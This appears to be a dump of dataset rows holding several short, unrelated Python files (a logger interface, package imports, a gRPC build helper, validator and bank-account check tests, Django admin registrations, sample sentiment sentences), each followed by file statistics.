src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | 1
|
2021-11-01T19:30:10.000Z
|
2021-11-01T19:30:10.000Z
|
src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | null | null | null |
src/loggers/logger.py
|
Kaltsoon/dead-link-checker
|
acf9364546e5606f9cebf00a847e3ac6322627c4
|
[
"MIT"
] | null | null | null |
class Logger:
def info(self, message: str) -> None:
raise NotImplementedError()
def success(self, message: str) -> None:
raise NotImplementedError()
def warning(self, message: str) -> None:
raise NotImplementedError()
def error(self, message: str) -> None:
raise NotImplementedError()
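# A minimal concrete implementation sketch (not part of the original file),
# assuming plain stdout output is acceptable:

class ConsoleLogger(Logger):
    def info(self, message: str) -> None:
        print(f"[INFO] {message}")

    def success(self, message: str) -> None:
        print(f"[OK] {message}")

    def warning(self, message: str) -> None:
        print(f"[WARN] {message}")

    def error(self, message: str) -> None:
        print(f"[ERROR] {message}")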
| 25.846154
| 44
| 0.636905
| 34
| 336
| 6.294118
| 0.382353
| 0.205607
| 0.261682
| 0.336449
| 0.827103
| 0.827103
| 0.630841
| 0
| 0
| 0
| 0
| 0
| 0.252976
| 336
| 12
| 45
| 28
| 0.85259
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.444444
| false
| 0
| 0
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
518e4130bb1f8405bf4a40dded9191a4239457b0
| 78
|
py
|
Python
|
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | 1
|
2020-11-05T19:51:23.000Z
|
2020-11-05T19:51:23.000Z
|
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | null | null | null |
mmdet3d/runners/xmuda/__init__.py
|
XYHC-MMDA/Multi-modal-Multi-task-DA
|
ed8297eb489d50c580795713cccb72bc958f406f
|
[
"Apache-2.0"
] | null | null | null |
from .xmuda_runner import XmudaRunner
from .source_runner import SourceRunner
| 26
| 39
| 0.871795
| 10
| 78
| 6.6
| 0.7
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 78
| 2
| 40
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a40af18464639b948799d5972dbeee3c9d05202d
| 137
|
py
|
Python
|
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | 4
|
2020-05-21T14:06:09.000Z
|
2021-12-17T23:35:42.000Z
|
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | null | null | null |
protos/__init__.py
|
daogework/grpc-file-transfer
|
eea4f9dbe88cc5ca1dd7b7a12b0ffbec0d69b8b9
|
[
"MIT"
] | 5
|
2020-07-06T09:27:42.000Z
|
2022-01-10T09:52:28.000Z
|
import os
import sys
import grpc_tools.command
sys.path.append(os.path.dirname(__file__))
grpc_tools.command.build_package_protos("")
| 15.222222
| 43
| 0.810219
| 21
| 137
| 4.904762
| 0.619048
| 0.174757
| 0.31068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.080292
| 137
| 8
| 44
| 17.125
| 0.81746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
cfad529c9118b12946c46ca9054389d340aed9a3
| 39
|
py
|
Python
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 106
|
2017-05-02T10:25:50.000Z
|
2022-03-23T14:57:28.000Z
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 2
|
2021-01-14T15:07:15.000Z
|
2021-12-21T07:18:05.000Z
|
python_circular_import/demo1/b.py
|
NightmareQAQ/python-notes
|
4e766be06073a495ff9654f0dd8c0bb03310c559
|
[
"MIT"
] | 42
|
2017-07-31T07:07:38.000Z
|
2021-12-26T09:36:55.000Z
|
def hello():
print('hello in b.py')
| 19.5
| 26
| 0.589744
| 7
| 39
| 3.285714
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 39
| 2
| 26
| 19.5
| 0.741935
| 0
| 0
| 0
| 0
| 0
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0.5
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5c54f8720af9c945341c0ed84b706166982af3b8
| 3,101
|
py
|
Python
|
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
test/validators/test_template.py
|
samadhicsec/threatware
|
f45068cfbbc2207ffa2b8f1b965b98cfb1ed9096
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import validators.template
from data.key import key as Key
def test_valid_template():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}', template value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}', , template values {}"
# If we read this key and value from a model
test_key = Key("test-key", ["template-verification-test"])
valid_value = "value from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
# then validate should return True
result = validators.template.validate(config, test_key, valid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == True
assert property_text == config["output_text_valid"].format(test_key, valid_value, template[template_key])
def test_invalid_template_invalid_value():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}'"
# If we read this key and value from a model
test_key = Key("test-key", ["template-verification-test"])
invalid_value = "value not from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
    # then validate should return False
result = validators.template.validate(config, test_key, invalid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == False
assert property_text == config["output_text_invalid"].format(test_key, invalid_value, [template[template_key]])
def test_invalid_template_invalid_key():
config = {}
config["output_text_valid"] = "Valid: Key '{}', value '{}'"
config["output_text_invalid"] = "Invalid: Key '{}', value '{}'"
# If we read this key and value from a model
test_key = Key("different-test-key", ["template-verification-test"])
valid_value = "value from template"
# And the same key and value exists in the template
template_key = Key("test-key", ["template-verification-test"])
template = {template_key:"value from template"}
references = {}
references['validator-tag'] = "template-verification-test"
references['template-model'] = template
    # then validate should return False
result = validators.template.validate(config, test_key, valid_value, references)
property_text = test_key.getProperty(references['validator-tag'])
assert result == False
assert property_text == config["output_text_invalid"].format(test_key, valid_value, [template[template_key]])
| 37.817073
| 115
| 0.693002
| 376
| 3,101
| 5.545213
| 0.119681
| 0.060432
| 0.069065
| 0.077698
| 0.921823
| 0.921823
| 0.905516
| 0.905516
| 0.843165
| 0.792326
| 0
| 0
| 0.17704
| 3,101
| 81
| 116
| 38.283951
| 0.817006
| 0.121574
| 0
| 0.6875
| 0
| 0
| 0.333088
| 0.08622
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0
| 0.0625
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7a5623937f87a57117a2363deb97534023ad8774
| 29
|
py
|
Python
|
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | 1
|
2021-01-10T07:04:30.000Z
|
2021-01-10T07:04:30.000Z
|
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | null | null | null |
manitou/__init__.py
|
immstudios/manitou
|
ceba87778f1b7695951c6b7a5f60def2825978b5
|
[
"MIT"
] | 1
|
2021-01-10T07:04:46.000Z
|
2021-01-10T07:04:46.000Z
|
from .manitou import Manitou
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7a758924f9447e53a38d5246bcbf0ae1d3414048
| 224
|
py
|
Python
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 28
|
2018-12-09T22:11:52.000Z
|
2022-02-01T16:48:23.000Z
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 16
|
2019-01-27T10:59:33.000Z
|
2022-01-11T09:09:24.000Z
|
cluster_tools/downscaling/__init__.py
|
constantinpape/cluster_tools
|
a7e88545b58f8315723bc47583916e1900a7892d
|
[
"MIT"
] | 11
|
2018-12-09T22:11:56.000Z
|
2021-08-08T20:10:13.000Z
|
from . downscaling_workflow import DownscalingWorkflow, PainteraToBdvWorkflow
from . upscaling import UpscalingLocal, UpscalingSlurm, UpscalingLSF
from . downscaling import DownscalingLocal, DownscalingSlurm, DownscalingLSF
| 56
| 77
| 0.875
| 18
| 224
| 10.833333
| 0.722222
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.089286
| 224
| 3
| 78
| 74.666667
| 0.955882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7a777da8aafdc3875ae134c2d184fc1efe77c105
| 39
|
py
|
Python
|
auth_signup_confirmation/controllers/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | null | null | null |
auth_signup_confirmation/controllers/__init__.py
|
agenterpgmbh/misc-addons
|
27e36d119b1e73089a2ebfcd8d4cfc706c8f1f41
|
[
"MIT"
] | 1
|
2020-05-03T04:27:29.000Z
|
2020-05-03T04:27:29.000Z
|
auth_signup_confirmation/controllers/__init__.py
|
eneldoserrata/misc-addons
|
6f3b94d8a71d603d9ad449f96edfc66385e78080
|
[
"MIT"
] | 2
|
2020-05-09T02:08:59.000Z
|
2022-03-21T06:37:15.000Z
|
from . import auth_signup_confirmation
| 19.5
| 38
| 0.871795
| 5
| 39
| 6.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 39
| 1
| 39
| 39
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7aae8df08b7f4f997abe8acb65c905a5c4586739
| 3,339
|
py
|
Python
|
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | null | null | null |
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | 4
|
2021-05-01T13:04:31.000Z
|
2022-03-02T21:22:35.000Z
|
test/tests/api/validate/test_validator_for_known_accounts.py
|
j-puri/random-uk-bank-account
|
caa5e91907641893dfb8969fcef18159bdc74223
|
[
"MIT"
] | null | null | null |
import pytest
from test.utils.test_fixtures.classes_under_test import generator
@pytest.mark.parametrize(
"sort_code,account_number", [
("118765", "64371389")
])
def test_known_values_for_exception_1(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("309070", "02355688"),
("309070", "12345668"),
("309070", "12345677"),
("309070", "99345694")
])
def test_known_values_for_exception_2_and_9(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("820000", "73688637"),
("827999", "73988638"),
("827101", "28748352"),
])
def test_known_values_for_exception_3(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("134020", "63849203")
])
def test_known_values_for_exception_4(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("938611", "07806039"),
("938611", "42368003"),
("938063", "55065200")
])
def test_known_values_for_exception_5(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("200915", "41011166")
])
def test_known_values_for_exception_6(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("772798", "99345694")
])
def test_known_values_for_exception_7(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("086090", "06774744")
])
def test_known_values_for_exception_8(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("871427", "46238510"),
("872427", "46238510"),
("871427", "09123496"),
("871427", "99123496"),
])
def test_known_values_for_exception_10_and_11(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("074456", "12345112"),
("070116", "34012583"),
("074456", "11104102")
])
def test_known_values_for_exception_12_and_13(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
@pytest.mark.parametrize(
"sort_code,account_number", [
("180002", "00000190")
])
def test_known_values_for_exception_14(generator, sort_code, account_number):
assert generator.validate(sort_code=sort_code, account_number=account_number)
| 32.105769
| 84
| 0.720875
| 394
| 3,339
| 5.72335
| 0.187817
| 0.156098
| 0.219512
| 0.307317
| 0.821729
| 0.821729
| 0.701996
| 0.649667
| 0.649667
| 0.649667
| 0
| 0.120623
| 0.153339
| 3,339
| 103
| 85
| 32.417476
| 0.677043
| 0
| 0
| 0.55
| 0
| 0
| 0.175502
| 0.079066
| 0
| 0
| 0
| 0
| 0.1375
| 1
| 0.1375
| false
| 0
| 0.025
| 0
| 0.1625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7abefc35bcfb4652c92f2f58cd8efb1e7a4a7f56
| 21
|
py
|
Python
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 5
|
2017-10-02T19:07:28.000Z
|
2017-11-11T17:02:30.000Z
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 9
|
2017-10-02T05:39:17.000Z
|
2018-12-17T11:23:43.000Z
|
server.py
|
v0idpwn/2dqg
|
506b9f636c06b296175edb26c33c06c2d1e685d5
|
[
"BSD-2-Clause"
] | 11
|
2017-10-02T06:13:49.000Z
|
2017-10-30T06:30:16.000Z
|
from quiz import app
| 10.5
| 20
| 0.809524
| 4
| 21
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 21
| 1
| 21
| 21
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8f8ba795d42e1f9dd3151c59300403efab670d87
| 146
|
py
|
Python
|
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
ads_project/chatAPI/admin.py
|
bornajouya/softio
|
d309fb9f67bdabc1a1d6886cb92569c53ece2172
|
[
"Unlicense"
] | null | null | null |
from django.contrib import admin
from .models import chat
# Register your models here.
admin.site.register(chat)
# admin.site.register(fk_model)
| 20.857143
| 32
| 0.794521
| 22
| 146
| 5.227273
| 0.590909
| 0.156522
| 0.295652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116438
| 146
| 6
| 33
| 24.333333
| 0.891473
| 0.383562
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8fb60cd9cf4e4086556e935cf5d55b7ff3cdd406
| 154
|
py
|
Python
|
eod/data/metrics/__init__.py
|
Helicopt/EOD
|
b5db36f4ce267bf64d093b8174bde2c4097b4718
|
[
"Apache-2.0"
] | 1
|
2021-11-24T09:32:27.000Z
|
2021-11-24T09:32:27.000Z
|
eod/data/metrics/__init__.py
|
jinfagang/EOD
|
a45b74430070d82d9248a10fb5e1116bb7ababe1
|
[
"Apache-2.0"
] | null | null | null |
eod/data/metrics/__init__.py
|
jinfagang/EOD
|
a45b74430070d82d9248a10fb5e1116bb7ababe1
|
[
"Apache-2.0"
] | null | null | null |
from .base_evaluator import Evaluator, Metric # noqa
from .coco_evaluator import CocoEvaluator # noqa
from .custom_evaluator import CustomEvaluator # noqa
| 51.333333
| 52
| 0.837662
| 19
| 154
| 6.631579
| 0.526316
| 0.357143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116883
| 154
| 3
| 53
| 51.333333
| 0.926471
| 0.090909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8fb96f5ee0397a8660aced258444409b290737e8
| 129
|
py
|
Python
|
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
ros_ws/src/baxter_interface/src/baxter_interface/navigator.py
|
mesneym/Baxter-Arm-PP
|
fdbf86309bc64c31af105daa026b2f8519710129
|
[
"MIT"
] | null | null | null |
version https://git-lfs.github.com/spec/v1
oid sha256:c557e8dc7413cddc3211426a539f644665da17b7284843a71992c7a93f297e37
size 6026
| 32.25
| 75
| 0.883721
| 13
| 129
| 8.769231
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.439024
| 0.046512
| 129
| 3
| 76
| 43
| 0.487805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8fc2e5098f3e026991bdfcbf4869013366dc05e4
| 61
|
py
|
Python
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 11
|
2016-12-13T00:46:48.000Z
|
2020-07-28T13:44:12.000Z
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 15
|
2017-11-29T19:38:32.000Z
|
2018-11-02T21:08:04.000Z
|
swiftwind/core/exceptions.py
|
m-den-i/swiftwind
|
3af9a1ec3327a992f1d3f2c11fefbb3c06cadbce
|
[
"MIT"
] | 4
|
2018-10-23T12:39:04.000Z
|
2019-12-30T11:06:23.000Z
|
class CannotCreateMultipleSettingsInstances(Exception): pass
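# Usage sketch (not part of the original file), assuming a hypothetical
# Django-style Settings model that must remain a singleton:
#
#     def save(self, *args, **kwargs):
#         if not self.pk and Settings.objects.exists():
#             raise CannotCreateMultipleSettingsInstances(
#                 "A Settings instance already exists; edit it instead.")
#         return super().save(*args, **kwargs)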
| 30.5
| 60
| 0.901639
| 4
| 61
| 13.75
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.04918
| 61
| 1
| 61
| 61
| 0.948276
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 6
|
8fd8d730edd65969459a4cb5a226ee18635c9bac
| 123
|
py
|
Python
|
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | 1
|
2019-06-13T15:59:43.000Z
|
2019-06-13T15:59:43.000Z
|
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | null | null | null |
rambo/resources/admin.py
|
sirmmo/RaMBo
|
81a87705a2aaa39256f48026021001c074dd9035
|
[
"BSD-2-Clause"
] | null | null | null |
from django.contrib import admin
from models import *
admin.site.register(Resource)
admin.site.register(UserConnection)
| 15.375
| 35
| 0.813008
| 16
| 123
| 6.25
| 0.625
| 0.22
| 0.34
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105691
| 123
| 7
| 36
| 17.571429
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
64f891d31e2da822ffa88c357147e3178971adf9
| 408
|
py
|
Python
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 15
|
2018-09-03T05:58:22.000Z
|
2020-07-01T04:52:49.000Z
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 33
|
2018-08-08T17:55:11.000Z
|
2021-06-01T14:27:16.000Z
|
sentiment-analysis/tests/test_data/test_sentences.py
|
arturgontijo/nlp-services
|
2bb3cef4aea4cd0687e984ef2414d5d2b8edc134
|
[
"MIT"
] | 25
|
2018-08-09T01:02:53.000Z
|
2020-12-20T05:09:21.000Z
|
def sentences():
return "[{\"id\": \"1\", \"sentence\": \"Grat price, fast shipping, great product.\"},{\"id\": \"2\", \"sentence\": \"@Oielayus I want to go to promote GEAR AND GROOVE but unfornately no ride there I may b going to the one in Anaheim in May though.\"},{\"id\": \"3\" , \"sentence\": \"@mja_dren2, is still sick, and worrying the orange she just ate is going to come back up... ugh.\"}]"
| 136
| 391
| 0.629902
| 64
| 408
| 4
| 0.78125
| 0.054688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.01173
| 0.164216
| 408
| 2
| 392
| 204
| 0.739003
| 0
| 0
| 0
| 0
| 0
| 0.10049
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
8f303beb4fefd2e3eec7faec7632cb6ac5d245f1
| 534
|
py
|
Python
|
slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-04-23T09:06:51.000Z
|
2021-08-19T07:18:32.000Z
|
slither/test/test_unit_conversions.py
|
AlexanderFabisch/slither
|
c527e0412cf89197f907a42699a554f26cb2af59
|
[
"BSD-2-Clause-FreeBSD"
] | 2
|
2021-04-01T08:55:46.000Z
|
2022-02-20T18:00:53.000Z
|
